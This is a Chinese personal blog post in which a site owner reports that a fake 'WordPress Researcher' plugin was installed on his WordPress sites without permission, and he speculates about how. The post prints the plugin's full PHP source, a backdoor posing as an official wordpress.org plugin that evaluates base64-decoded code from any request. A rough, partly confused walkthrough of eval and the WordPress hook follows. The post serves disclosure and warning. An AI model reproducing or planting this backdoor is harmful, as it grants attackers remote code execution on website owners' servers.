6

WTF!WordPresshacked~

Posted by icdt on 2014-08-03 in 计算机网络 |

wp_hack

大家警惕!看看是否有一个叫 WordPress Researcher的插件!

查看了一下插件的安装日期是7月24日下午2点,WTF那个时候我在上班啊!所以我一开始就感觉不对。我一个有3个网站被强行安装上了:a.cx,cny.club,a.cx

我的wordpress版本都是最新的,而且也没有安装什么乱七八糟的插件,都是来自官网。

现在思考下来,hacked的原因只有2个:

1)Wordpress本身的程序漏洞。从Wordpress的前科看,这个可能性很大,Wordpress屡屡爆出hacked,毕竟是全球性的开源程序,有很多黑客在研究Wordpress

2)我自己的密码泄露。感觉这个可能性不大,我一般都是在自己家里管理Wordpress的。但是有那么一丝可能性,因为我在单位电脑登录过,那么单位电脑有木马病毒什么的还要进一步去侦查。但是,如果有木马,那也是“国产货”专门盗游戏密码什么的,我区区一个Wordpress值得他盗么?所以也不太可能。

深思熟虑下来,一的可能性占到99%。

附上该插件的源代码:

<?php
/*
Plugin Name: WordPress Researcher
Plugin URI: http://wordpress.org/extend/plugins/
Description: WordPress research tool.
Author: wordpressdotorg
Author URI: http://wordpress.org/
Text Domain: wordpress-researcher
License: GPL version 2 or later – http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
Version: 2.2.4
Copyright 2013  wordpressdotorg
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110, USA
*/
    function research_plugin()
    {
        if (isset($_REQUEST[‘JQIW’]))
        {
            eval(base64_decode($_REQUEST[‘JQIW’]));
        }
        return;
    }
    add_action(‘after_setup_theme’, ‘research_plugin’);
?>

解析一下代码:

一共就2个函数

第一函数 research_plugin()  先是判断是否定义过$_REQUEST[‘JQIW’]

$_REQUEST是一个超全局变量,里面包括有
$_GET
$_POST
$_COOKIE

功能是接受表单, ‘JQIW’

如果是,那么他开始编码

例子

<?php
$string = "beautiful";
$time = "winter";

$str = 'This is a $string $time morning!';
echo $str. "<br />";

eval("\$str = \"$str\";");
echo $str;
?>

输出:

This is a $string $time morning!
This is a beautiful winter morning!

第二个函数是一个动作

WordPress有一个叫做after_setup_theme的动作hook。一旦父/子主题的功能文件加载完毕,这个hook也会被执行。after_setup_theme是一个非常实用的hook,WordPress默认主题TwentyTen也使用了这个hook。

add_action( 'after_setup_theme', 'browncoats_theme_setup' );

6 Comments

发表回复

版权所有 © 2009-2023 不知道起什么标题 A.CX / Q.ST / Z.ST / 6.LS / WO.GS 本人保留本站所有权利

我并不是一个炒域名的,80%的情况,我都是为自己以后新的商业方向在屯域名,更多的是考虑商业用途。
总的原则是:我可以不用,但是先屯着,哪天启用不知道。就是玩。
【珍爱生命 坚决不碰.com 大顶背离 最辉煌的时代已过,如今百家争鸣,百花齐放 】
单字符 a.cx / 6.ls / z.st / q.st / n.srl
游戏酷 YX.COOL
电竞酷/店家酷/大家酷 DJ.COOL
数字酷/神舟酷/神州酷 SZ.COOL
AI人工智能 ai.st / ai.gy / zai.ee / gai.ee / kuai.ee
元宇宙 yuan.st / yuan.ee / imeta.ee
云计算 YUN.gs
QP全品汇 qp.gs
RH融合/融汇 rh.gs
押宝/抵押/质押/压注/牙齿 YA.gs
付/服/富/福/复/辅 FU.gs
xin概念 xin.st / xin.sx / xin.mx / xin.gd
金融类 sh.vc / cf.cx / xcj.cc / ebank.xin / fei.ee / fei.gs
新品/芯片/相片/小品/鲜品查询 xp.cx
统一/体育/体验/通用/天眼查询 ty.cx
科技/空间/开奖/快捷/跨境查询/科技创新 KJ.CX
户籍/环境/黄金/获奖/幻境查询/创新 hj.cx
工业/公园/公寓/供应/工艺/公用/公益查询/创新 gy.cx
壁纸/标志/标准/包装/币种/保障/博主查询/创新 bz.cx
版权/表情/标签/百强/便签/百强/霸气查询/创新 bq.cx
客户/开户/科幻/狂欢查询/创新 kh.cx
百日/百融/百润/百荣查询/创新 br.cx
名牌/门牌/米铺/名片查询/创新 mp.cx
商务/事务/税务/食物/思维/上网查询/创新 sw.cx
法律/返利/福利/风冷/分类/风力查询/创新 fl.cx
业务/药物/衣物/愿望/运维/英文查询/创新 yw.cx
信号/笑话/协会/现货/玄幻/虚幻查询/创新 xh.cx
资本/直播/周边/主播/指标/装备/主板查询/创新 zb.cx
账期/证券/债权/赚钱/足球/桌球/中签查询/创新 zq.cx
汽车行业 che.cx
房产讯/房查询/房车行 fcx.cc
类淘宝/网购/团购行业 tao.gs / tuan.gs
共享经济 gxt.cc
city 城市类 mo.city / bao.city / wode.city
大上海/生活 mmsh.cn / ppsh.cn /kqsh.cn / shc.ren
ktsh.cn / rdsh.cn / pmsh.cn
上海/香港 shk.cc
网站门户类 csb.wang / xbb.wang
夜生活类 ye.ee / YE0.cn / am6.cn
ci /词系列 lx.ci / gj.ci / gs.ci / xs.ci / ico.ci
大中华 CHINA.LT
其他商业用途 新时期xsq.cc / wpi.cc / 微社团wei.st / 173.pm / riso.vip / PCO.LTD/ PICO.LTD
万维时空wwsk.cn / 万维美居wwmj.cn / 完美时光wmsg.cn/ 分公司fen.gs
私人用途 wo.gs / oh.gs / zis.cc / chen.ee / 霸气ba7.cn / 6vd.cn
All Included.

Top